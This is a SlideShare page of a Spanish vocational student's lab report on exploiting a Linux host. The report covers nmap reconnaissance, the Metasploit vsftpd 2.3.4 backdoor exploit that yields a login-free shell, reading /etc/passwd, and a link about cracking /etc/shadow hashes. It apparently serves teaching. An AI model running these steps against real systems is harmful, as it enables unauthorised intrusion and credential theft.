SlideShare una empresa de Scribd logo
1 de 10
Miguel Ángel Marchal Barrera
COLEGIO CIUDAD DE LOS MUCHACHOS SISTEMAS MICROINFORMÁTICOS Y REDES CURSO 2016/2017
EXPLOTACIÓN SISTEMA OPERATIVO
PÁGINA 1|9
MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS
IDENTIFICACIÓN DEL OBJETIVO
Comprobar si tenemosacceso a la máquina que queremosatacar
Comandoping+ direccióndel interfazde red
Abrirel terminal de Kali-linux
Introducir:ping192.168.1.104 (esla direccióndel equipoaatacar)
Si tenemosconectividad nose perderáningúnpaquete enviado
Detectar los equiposactivos de la red
Comandonmap –sP + direcciónde red
Introducir:nmap–sP 192.168.1.0/24
Escaneala red enbusca de losequiposque estánfuncionandoenlaLAN mostrandolasMAC y
lasdireccionesIPde cada equipo.
PÁGINA 2|9
MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS
ANÁLISIS DE PUERTOS Y SERVICIOS
Identificaciónde puertosque usa la máquina
Comandonmap –sT -O+ direccióndel interfazde red
Introducir:nmap –sT -O192.168.1.104
Muestra lospuertosque utilizanlamáquinay laversióndel sistemaoperativo
PÁGINA 3|9
MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS
Comprobar versionesde servicios
Comandonmap –sT –sV direccióndel interfazde red
Introducir:nmap –sT –sV 192.168.1.104
Muestra puertosabiertos,serviciosyversionesde éstos.
Comprobar versionesde serviciosmediante comando telnet
Comandotelnet+IP del interfazde red+ puertoabierto
Introducir:telnet192.168.1.104 21
Muestra laversióndel serviciodelpuertoseleccionado parasabersi esposible que exista
algunavulnerabilidadenlaversión.
PÁGINA 4|9
MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS
Conexióna través del servicioseleccionado
Comandotelnet,FTPySSH
Accesocon comandotelnet
Comandotelnet+IP interfazde red
Introducir:telnet192.168.1.104
Accedemosala máquinaymuestrael interfazde textopidiendologin desconocido.
Accesocon comandoFTP
Comandoftp + IPinterfazde red
Introducir:ftp192.168.1.104
Accesomediante servicioftppidiendocontraseña desconocida.
Accesocon comandoSSH
Comandossh + IP interfazde red
Introducir:ssh 192.168.1.104
Accesomediante serviciosshpidiendocontraseña desconocida.
PÁGINA 5|9
MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS
ANÁLISIS DE VULNERABILIDADES
Herramientametasploit
Iniciarla herramientaintroduciendo:msfconsole
Comprobarlos exploitsde laversiónque puedenhacervulnerable el accesoporel servicio
Introducircomando:searchftp
Lista de exploitsque podemosutilizarparaaccederde modo remotoa la máquinaque
queremosatacar.
PÁGINA 6|9
MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS
EXPLOTACIÓN DE VULNERABILIDADES
Localizamosel xploitpreparadoparaatacar
Este exploitnosinformaque es excelente parausar.
Para usar el xploit
Comandouse + direccióndel exploit
Introducir:use exploit/unix/ftp/vsftpd_234_backdoor
Comprobarla configuraciónde parámetros
Comandoshowoptions
Introducir:showoptions
Se compruebasi se necesitaalgunaconfiguraciónadicional parausarel exploit,necesitaremos
configurarel RHOST asignandolaIPde lamáquinaatacada.
RHOST: Remote Host.
RPORT: Remote Port.
ConfiguraciónRHOST
ComandosetRHOST + direccióndel interfazde red
Introducir:setRHOST 192.168.1.104
PÁGINA 7|9
MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS
Buscar payloaddisponible
Comandoshowpayloads
Introducir:showpayloads
Muestra el disponible
Utilizarel payloaddisponible
Comandosetpayload + payloaddisponible
Introducir:setpayloadcmd/unix/interact
Accederremotamente alamáquina
Comandoexploit
Introducior:exploit
Accesopermitidoremotoalamáquinaatacada.
Con este últimocomandohabremosaccedidoalamáquinafinalmente,sinnecesidadde login
de ningúntipoy se podrá accedera losdirectoriosyarchivosde maneratransparante.
PÁGINA 8|9
MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS
POST-EXPLOTACIÓN DEL SISTEMA
Uso de comandoscomosi estuviéramosenlamismamáquina.
Comandols
Directoriosde laraíz de la máquinaatacada.
PÁGINA 9|9
MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS
Obtenciónde contraseña
Comandocat
Introducir:cat etc/passwd
La estructuraes:
<nombre>,<password><uid>, <gid>,<descripción opcional> <carpeta>, <shell>
<nombre>: Nombre de usuario.
<password>: Si es igual a “x” la contraseña está almacenada en /etc/shadow, si es igual a “!” el
usuario está bloqueado y si es igual a “!!” no tiene contraseña.
<uid>: Número de identificador, para root 0, para los demás un número entre 1 y 65535.
<gid>: Grupo al que está asignado.
<descripción opcional>: Descripción añadida al perfil de usuario.
<carpeta>: Carpeta de inicio de usuario de cada usuario.
<shell>: Intérprete de línea de comandos de Linux.
Con esto no descifraremos la contraseña, sólo veremos los usuarios configurados, ésta está
alojada en etc/shadowy está encriptada, para ello existen herramientas y tutoriales paso a
paso para descifrarlas, en este link se explica cómo.
https://www.youtube.com/watch?v=DntHkcbq-wY

Más contenido relacionado

La actualidad más candente

Examen l ry s diciembre2005 resuelto
Examen l ry s diciembre2005 resueltoExamen l ry s diciembre2005 resuelto
Examen l ry s diciembre2005 resueltoAlfonso
 
Ejercicio 23 05-2016 cisco packet tracer
Ejercicio 23 05-2016 cisco packet tracerEjercicio 23 05-2016 cisco packet tracer
Ejercicio 23 05-2016 cisco packet tracerInmaculada Concepción
 
EJERCICIOS EN PACKET TRACER
EJERCICIOS EN PACKET TRACEREJERCICIOS EN PACKET TRACER
EJERCICIOS EN PACKET TRACERDaniella Park
 
Práctica final acl
Práctica final aclPráctica final acl
Práctica final aclchinazo
 
Resumen comandos router
Resumen comandos routerResumen comandos router
Resumen comandos routerjlvive
 
Comandos Configuración Router CISCO
Comandos Configuración Router CISCOComandos Configuración Router CISCO
Comandos Configuración Router CISCODavid Fernando Marìn
 
Laboratorio Vlan
Laboratorio VlanLaboratorio Vlan
Laboratorio Vlanccardila
 
Configurar vlan en packet tracer
Configurar vlan en packet tracerConfigurar vlan en packet tracer
Configurar vlan en packet tracerJushaya Wílliams
 
Configurando Ospf Dr Y Bdr
Configurando Ospf Dr Y BdrConfigurando Ospf Dr Y Bdr
Configurando Ospf Dr Y BdrCésar Nuñez
 
Comandos de configuracion de dispositivos cisco
Comandos de configuracion de dispositivos ciscoComandos de configuracion de dispositivos cisco
Comandos de configuracion de dispositivos ciscoCISCO NETWORKING
 
Configuración Firewall - CISCO ASA 5510
Configuración Firewall - CISCO ASA 5510Configuración Firewall - CISCO ASA 5510
Configuración Firewall - CISCO ASA 5510Vanesa Rodríguez Percy
 
Laboratorio 8 enrutamiento dinamico part 2
Laboratorio 8 enrutamiento dinamico part 2Laboratorio 8 enrutamiento dinamico part 2
Laboratorio 8 enrutamiento dinamico part 2yoes1053
 
Practica con firewall asa
Practica con firewall asaPractica con firewall asa
Practica con firewall asawebsyo
 
Guia básica Packet Tracer
Guia básica Packet TracerGuia básica Packet Tracer
Guia básica Packet TracerErick Calderin
 

La actualidad más candente (20)

Ejercicio ccna 3
Ejercicio ccna 3Ejercicio ccna 3
Ejercicio ccna 3
 
Examen l ry s diciembre2005 resuelto
Examen l ry s diciembre2005 resueltoExamen l ry s diciembre2005 resuelto
Examen l ry s diciembre2005 resuelto
 
Ejercicio 23 05-2016 cisco packet tracer
Ejercicio 23 05-2016 cisco packet tracerEjercicio 23 05-2016 cisco packet tracer
Ejercicio 23 05-2016 cisco packet tracer
 
EJERCICIOS EN PACKET TRACER
EJERCICIOS EN PACKET TRACEREJERCICIOS EN PACKET TRACER
EJERCICIOS EN PACKET TRACER
 
Práctica final acl
Práctica final aclPráctica final acl
Práctica final acl
 
Resumen comandos router
Resumen comandos routerResumen comandos router
Resumen comandos router
 
Comandos Configuración Router CISCO
Comandos Configuración Router CISCOComandos Configuración Router CISCO
Comandos Configuración Router CISCO
 
compu
compu compu
compu
 
Eliminar una vlan
Eliminar una vlanEliminar una vlan
Eliminar una vlan
 
Laboratorio Vlan
Laboratorio VlanLaboratorio Vlan
Laboratorio Vlan
 
Solucion de acl juntas
Solucion de acl juntasSolucion de acl juntas
Solucion de acl juntas
 
Configurar vlan en packet tracer
Configurar vlan en packet tracerConfigurar vlan en packet tracer
Configurar vlan en packet tracer
 
Acl extendida
Acl extendidaAcl extendida
Acl extendida
 
Ejercicios ripv2
Ejercicios ripv2Ejercicios ripv2
Ejercicios ripv2
 
Configurando Ospf Dr Y Bdr
Configurando Ospf Dr Y BdrConfigurando Ospf Dr Y Bdr
Configurando Ospf Dr Y Bdr
 
Comandos de configuracion de dispositivos cisco
Comandos de configuracion de dispositivos ciscoComandos de configuracion de dispositivos cisco
Comandos de configuracion de dispositivos cisco
 
Configuración Firewall - CISCO ASA 5510
Configuración Firewall - CISCO ASA 5510Configuración Firewall - CISCO ASA 5510
Configuración Firewall - CISCO ASA 5510
 
Laboratorio 8 enrutamiento dinamico part 2
Laboratorio 8 enrutamiento dinamico part 2Laboratorio 8 enrutamiento dinamico part 2
Laboratorio 8 enrutamiento dinamico part 2
 
Practica con firewall asa
Practica con firewall asaPractica con firewall asa
Practica con firewall asa
 
Guia básica Packet Tracer
Guia básica Packet TracerGuia básica Packet Tracer
Guia básica Packet Tracer
 

Similar a Explotación sistema operativo

Documento24 practica 5
Documento24 practica 5 Documento24 practica 5
Documento24 practica 5 mariodl2479
 
Escaneo de Puertos
Escaneo de PuertosEscaneo de Puertos
Escaneo de Puertosarnoldvq16
 
Herramientas administrativas de red en diferentes sistemas operativos
Herramientas administrativas de red en diferentes sistemas operativosHerramientas administrativas de red en diferentes sistemas operativos
Herramientas administrativas de red en diferentes sistemas operativosYinaGarzon
 
Herramientas administrativas de red en diferentes sistemas operativos
Herramientas administrativas de red en diferentes sistemas operativosHerramientas administrativas de red en diferentes sistemas operativos
Herramientas administrativas de red en diferentes sistemas operativosYinaGarzon
 
Comandos utilizados en redes anderson alvarado 6to computacion
Comandos utilizados en redes anderson alvarado 6to computacionComandos utilizados en redes anderson alvarado 6to computacion
Comandos utilizados en redes anderson alvarado 6to computacionAnder Alvarado
 
Listas de acceso estándar y extendidas
Listas de acceso estándar y extendidasListas de acceso estándar y extendidas
Listas de acceso estándar y extendidasJAV_999
 
Practica 1 eigrp
Practica 1 eigrpPractica 1 eigrp
Practica 1 eigrpw2k111984
 
Seguridad: Backtrack2
Seguridad: Backtrack2 Seguridad: Backtrack2
Seguridad: Backtrack2 Francesc Perez
 
How to medidas de desempeño
How to medidas de desempeñoHow to medidas de desempeño
How to medidas de desempeñomiss051
 
511591245-Comandos-CCNA-v7.pptx
511591245-Comandos-CCNA-v7.pptx511591245-Comandos-CCNA-v7.pptx
511591245-Comandos-CCNA-v7.pptxRonaldoRomero7
 

Similar a Explotación sistema operativo (20)

Documento24 practica 5
Documento24 practica 5 Documento24 practica 5
Documento24 practica 5
 
Escaneo de Puertos
Escaneo de PuertosEscaneo de Puertos
Escaneo de Puertos
 
firewall.pptx
firewall.pptxfirewall.pptx
firewall.pptx
 
Herramientas administrativas de red en diferentes sistemas operativos
Herramientas administrativas de red en diferentes sistemas operativosHerramientas administrativas de red en diferentes sistemas operativos
Herramientas administrativas de red en diferentes sistemas operativos
 
Herramientas administrativas de red en diferentes sistemas operativos
Herramientas administrativas de red en diferentes sistemas operativosHerramientas administrativas de red en diferentes sistemas operativos
Herramientas administrativas de red en diferentes sistemas operativos
 
Practica 5 irdt
Practica 5 irdtPractica 5 irdt
Practica 5 irdt
 
Practica 5 irdt
Practica 5 irdtPractica 5 irdt
Practica 5 irdt
 
Practica 5 irdt
Practica 5 irdtPractica 5 irdt
Practica 5 irdt
 
Comandos utilizados en redes anderson alvarado 6to computacion
Comandos utilizados en redes anderson alvarado 6to computacionComandos utilizados en redes anderson alvarado 6to computacion
Comandos utilizados en redes anderson alvarado 6to computacion
 
Listas de acceso estándar y extendidas
Listas de acceso estándar y extendidasListas de acceso estándar y extendidas
Listas de acceso estándar y extendidas
 
Comandos red
Comandos redComandos red
Comandos red
 
Listas de acceso
Listas de accesoListas de acceso
Listas de acceso
 
Practica 1 eigrp
Practica 1 eigrpPractica 1 eigrp
Practica 1 eigrp
 
Seguridad: Backtrack2
Seguridad: Backtrack2 Seguridad: Backtrack2
Seguridad: Backtrack2
 
How to medidas de desempeño
How to medidas de desempeñoHow to medidas de desempeño
How to medidas de desempeño
 
Firewall
FirewallFirewall
Firewall
 
Como usar Aircrack
Como usar AircrackComo usar Aircrack
Como usar Aircrack
 
Taller
TallerTaller
Taller
 
Linux red + VNC
Linux red + VNCLinux red + VNC
Linux red + VNC
 
511591245-Comandos-CCNA-v7.pptx
511591245-Comandos-CCNA-v7.pptx511591245-Comandos-CCNA-v7.pptx
511591245-Comandos-CCNA-v7.pptx
 

Último

Trabajo Mas Completo De Excel en clase tecnología
Trabajo Mas Completo De Excel en clase tecnologíaTrabajo Mas Completo De Excel en clase tecnología
Trabajo Mas Completo De Excel en clase tecnologíassuserf18419
 
Hernandez_Hernandez_Practica web de la sesion 12.pptx
Hernandez_Hernandez_Practica web de la sesion 12.pptxHernandez_Hernandez_Practica web de la sesion 12.pptx
Hernandez_Hernandez_Practica web de la sesion 12.pptxJOSEMANUELHERNANDEZH11
 
guía de registro de slideshare por Brayan Joseph
guía de registro de slideshare por Brayan Josephguía de registro de slideshare por Brayan Joseph
guía de registro de slideshare por Brayan JosephBRAYANJOSEPHPEREZGOM
 
International Women's Day Sucre 2024 (IWD)
International Women's Day Sucre 2024 (IWD)International Women's Day Sucre 2024 (IWD)
International Women's Day Sucre 2024 (IWD)GDGSucre
 
trabajotecologiaisabella-240424003133-8f126965.pdf
trabajotecologiaisabella-240424003133-8f126965.pdftrabajotecologiaisabella-240424003133-8f126965.pdf
trabajotecologiaisabella-240424003133-8f126965.pdfIsabellaMontaomurill
 
Proyecto integrador. Las TIC en la sociedad S4.pptx
Proyecto integrador. Las TIC en la sociedad S4.pptxProyecto integrador. Las TIC en la sociedad S4.pptx
Proyecto integrador. Las TIC en la sociedad S4.pptx241521559
 
KELA Presentacion Costa Rica 2024 - evento Protégeles
KELA Presentacion Costa Rica 2024 - evento ProtégelesKELA Presentacion Costa Rica 2024 - evento Protégeles
KELA Presentacion Costa Rica 2024 - evento ProtégelesFundación YOD YOD
 
CLASE DE TECNOLOGIA E INFORMATICA PRIMARIA
CLASE  DE TECNOLOGIA E INFORMATICA PRIMARIACLASE  DE TECNOLOGIA E INFORMATICA PRIMARIA
CLASE DE TECNOLOGIA E INFORMATICA PRIMARIAWilbisVega
 
Global Azure Lima 2024 - Integración de Datos con Microsoft Fabric
Global Azure Lima 2024 - Integración de Datos con Microsoft FabricGlobal Azure Lima 2024 - Integración de Datos con Microsoft Fabric
Global Azure Lima 2024 - Integración de Datos con Microsoft FabricKeyla Dolores Méndez
 
Redes direccionamiento y subredes ipv4 2024 .pdf
Redes direccionamiento y subredes ipv4 2024 .pdfRedes direccionamiento y subredes ipv4 2024 .pdf
Redes direccionamiento y subredes ipv4 2024 .pdfsoporteupcology
 
POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...
POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...
POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...silviayucra2
 
9egb-lengua y Literatura.pdf_texto del estudiante
9egb-lengua y Literatura.pdf_texto del estudiante9egb-lengua y Literatura.pdf_texto del estudiante
9egb-lengua y Literatura.pdf_texto del estudianteAndreaHuertas24
 
La era de la educación digital y sus desafios
La era de la educación digital y sus desafiosLa era de la educación digital y sus desafios
La era de la educación digital y sus desafiosFundación YOD YOD
 
Cortes-24-de-abril-Tungurahua-3 año 2024
Cortes-24-de-abril-Tungurahua-3 año 2024Cortes-24-de-abril-Tungurahua-3 año 2024
Cortes-24-de-abril-Tungurahua-3 año 2024GiovanniJavierHidalg
 
Plan de aula informatica segundo periodo.docx
Plan de aula informatica segundo periodo.docxPlan de aula informatica segundo periodo.docx
Plan de aula informatica segundo periodo.docxpabonheidy28
 
EPA-pdf resultado da prova presencial Uninove
EPA-pdf resultado da prova presencial UninoveEPA-pdf resultado da prova presencial Uninove
EPA-pdf resultado da prova presencial UninoveFagnerLisboa3
 

Último (16)

Trabajo Mas Completo De Excel en clase tecnología
Trabajo Mas Completo De Excel en clase tecnologíaTrabajo Mas Completo De Excel en clase tecnología
Trabajo Mas Completo De Excel en clase tecnología
 
Hernandez_Hernandez_Practica web de la sesion 12.pptx
Hernandez_Hernandez_Practica web de la sesion 12.pptxHernandez_Hernandez_Practica web de la sesion 12.pptx
Hernandez_Hernandez_Practica web de la sesion 12.pptx
 
guía de registro de slideshare por Brayan Joseph
guía de registro de slideshare por Brayan Josephguía de registro de slideshare por Brayan Joseph
guía de registro de slideshare por Brayan Joseph
 
International Women's Day Sucre 2024 (IWD)
International Women's Day Sucre 2024 (IWD)International Women's Day Sucre 2024 (IWD)
International Women's Day Sucre 2024 (IWD)
 
trabajotecologiaisabella-240424003133-8f126965.pdf
trabajotecologiaisabella-240424003133-8f126965.pdftrabajotecologiaisabella-240424003133-8f126965.pdf
trabajotecologiaisabella-240424003133-8f126965.pdf
 
Proyecto integrador. Las TIC en la sociedad S4.pptx
Proyecto integrador. Las TIC en la sociedad S4.pptxProyecto integrador. Las TIC en la sociedad S4.pptx
Proyecto integrador. Las TIC en la sociedad S4.pptx
 
KELA Presentacion Costa Rica 2024 - evento Protégeles
KELA Presentacion Costa Rica 2024 - evento ProtégelesKELA Presentacion Costa Rica 2024 - evento Protégeles
KELA Presentacion Costa Rica 2024 - evento Protégeles
 
CLASE DE TECNOLOGIA E INFORMATICA PRIMARIA
CLASE  DE TECNOLOGIA E INFORMATICA PRIMARIACLASE  DE TECNOLOGIA E INFORMATICA PRIMARIA
CLASE DE TECNOLOGIA E INFORMATICA PRIMARIA
 
Global Azure Lima 2024 - Integración de Datos con Microsoft Fabric
Global Azure Lima 2024 - Integración de Datos con Microsoft FabricGlobal Azure Lima 2024 - Integración de Datos con Microsoft Fabric
Global Azure Lima 2024 - Integración de Datos con Microsoft Fabric
 
Redes direccionamiento y subredes ipv4 2024 .pdf
Redes direccionamiento y subredes ipv4 2024 .pdfRedes direccionamiento y subredes ipv4 2024 .pdf
Redes direccionamiento y subredes ipv4 2024 .pdf
 
POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...
POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...
POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...
 
9egb-lengua y Literatura.pdf_texto del estudiante
9egb-lengua y Literatura.pdf_texto del estudiante9egb-lengua y Literatura.pdf_texto del estudiante
9egb-lengua y Literatura.pdf_texto del estudiante
 
La era de la educación digital y sus desafios
La era de la educación digital y sus desafiosLa era de la educación digital y sus desafios
La era de la educación digital y sus desafios
 
Cortes-24-de-abril-Tungurahua-3 año 2024
Cortes-24-de-abril-Tungurahua-3 año 2024Cortes-24-de-abril-Tungurahua-3 año 2024
Cortes-24-de-abril-Tungurahua-3 año 2024
 
Plan de aula informatica segundo periodo.docx
Plan de aula informatica segundo periodo.docxPlan de aula informatica segundo periodo.docx
Plan de aula informatica segundo periodo.docx
 
EPA-pdf resultado da prova presencial Uninove
EPA-pdf resultado da prova presencial UninoveEPA-pdf resultado da prova presencial Uninove
EPA-pdf resultado da prova presencial Uninove
 

Explotación sistema operativo

  • 1. Miguel Ángel Marchal Barrera COLEGIO CIUDAD DE LOS MUCHACHOS SISTEMAS MICROINFORMÁTICOS Y REDES CURSO 2016/2017 EXPLOTACIÓN SISTEMA OPERATIVO
  • 2. PÁGINA 1|9 MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS IDENTIFICACIÓN DEL OBJETIVO Comprobar si tenemosacceso a la máquina que queremosatacar Comandoping+ direccióndel interfazde red Abrirel terminal de Kali-linux Introducir:ping192.168.1.104 (esla direccióndel equipoaatacar) Si tenemosconectividad nose perderáningúnpaquete enviado Detectar los equiposactivos de la red Comandonmap –sP + direcciónde red Introducir:nmap–sP 192.168.1.0/24 Escaneala red enbusca de losequiposque estánfuncionandoenlaLAN mostrandolasMAC y lasdireccionesIPde cada equipo.
  • 3. PÁGINA 2|9 MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS ANÁLISIS DE PUERTOS Y SERVICIOS Identificaciónde puertosque usa la máquina Comandonmap –sT -O+ direccióndel interfazde red Introducir:nmap –sT -O192.168.1.104 Muestra lospuertosque utilizanlamáquinay laversióndel sistemaoperativo
  • 4. PÁGINA 3|9 MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS Comprobar versionesde servicios Comandonmap –sT –sV direccióndel interfazde red Introducir:nmap –sT –sV 192.168.1.104 Muestra puertosabiertos,serviciosyversionesde éstos. Comprobar versionesde serviciosmediante comando telnet Comandotelnet+IP del interfazde red+ puertoabierto Introducir:telnet192.168.1.104 21 Muestra laversióndel serviciodelpuertoseleccionado parasabersi esposible que exista algunavulnerabilidadenlaversión.
  • 5. PÁGINA 4|9 MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS Conexióna través del servicioseleccionado Comandotelnet,FTPySSH Accesocon comandotelnet Comandotelnet+IP interfazde red Introducir:telnet192.168.1.104 Accedemosala máquinaymuestrael interfazde textopidiendologin desconocido. Accesocon comandoFTP Comandoftp + IPinterfazde red Introducir:ftp192.168.1.104 Accesomediante servicioftppidiendocontraseña desconocida. Accesocon comandoSSH Comandossh + IP interfazde red Introducir:ssh 192.168.1.104 Accesomediante serviciosshpidiendocontraseña desconocida.
  • 6. PÁGINA 5|9 MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS ANÁLISIS DE VULNERABILIDADES Herramientametasploit Iniciarla herramientaintroduciendo:msfconsole Comprobarlos exploitsde laversiónque puedenhacervulnerable el accesoporel servicio Introducircomando:searchftp Lista de exploitsque podemosutilizarparaaccederde modo remotoa la máquinaque queremosatacar.
  • 7. PÁGINA 6|9 MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS EXPLOTACIÓN DE VULNERABILIDADES Localizamosel xploitpreparadoparaatacar Este exploitnosinformaque es excelente parausar. Para usar el xploit Comandouse + direccióndel exploit Introducir:use exploit/unix/ftp/vsftpd_234_backdoor Comprobarla configuraciónde parámetros Comandoshowoptions Introducir:showoptions Se compruebasi se necesitaalgunaconfiguraciónadicional parausarel exploit,necesitaremos configurarel RHOST asignandolaIPde lamáquinaatacada. RHOST: Remote Host. RPORT: Remote Port. ConfiguraciónRHOST ComandosetRHOST + direccióndel interfazde red Introducir:setRHOST 192.168.1.104
  • 8. PÁGINA 7|9 MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS Buscar payloaddisponible Comandoshowpayloads Introducir:showpayloads Muestra el disponible Utilizarel payloaddisponible Comandosetpayload + payloaddisponible Introducir:setpayloadcmd/unix/interact Accederremotamente alamáquina Comandoexploit Introducior:exploit Accesopermitidoremotoalamáquinaatacada. Con este últimocomandohabremosaccedidoalamáquinafinalmente,sinnecesidadde login de ningúntipoy se podrá accedera losdirectoriosyarchivosde maneratransparante.
  • 9. PÁGINA 8|9 MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS POST-EXPLOTACIÓN DEL SISTEMA Uso de comandoscomosi estuviéramosenlamismamáquina. Comandols Directoriosde laraíz de la máquinaatacada.
  • 10. PÁGINA 9|9 MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS Obtenciónde contraseña Comandocat Introducir:cat etc/passwd La estructuraes: <nombre>,<password><uid>, <gid>,<descripción opcional> <carpeta>, <shell> <nombre>: Nombre de usuario. <password>: Si es igual a “x” la contraseña está almacenada en /etc/shadow, si es igual a “!” el usuario está bloqueado y si es igual a “!!” no tiene contraseña. <uid>: Número de identificador, para root 0, para los demás un número entre 1 y 65535. <gid>: Grupo al que está asignado. <descripción opcional>: Descripción añadida al perfil de usuario. <carpeta>: Carpeta de inicio de usuario de cada usuario. <shell>: Intérprete de línea de comandos de Linux. Con esto no descifraremos la contraseña, sólo veremos los usuarios configurados, ésta está alojada en etc/shadowy está encriptada, para ello existen herramientas y tutoriales paso a paso para descifrarlas, en este link se explica cómo. https://www.youtube.com/watch?v=DntHkcbq-wY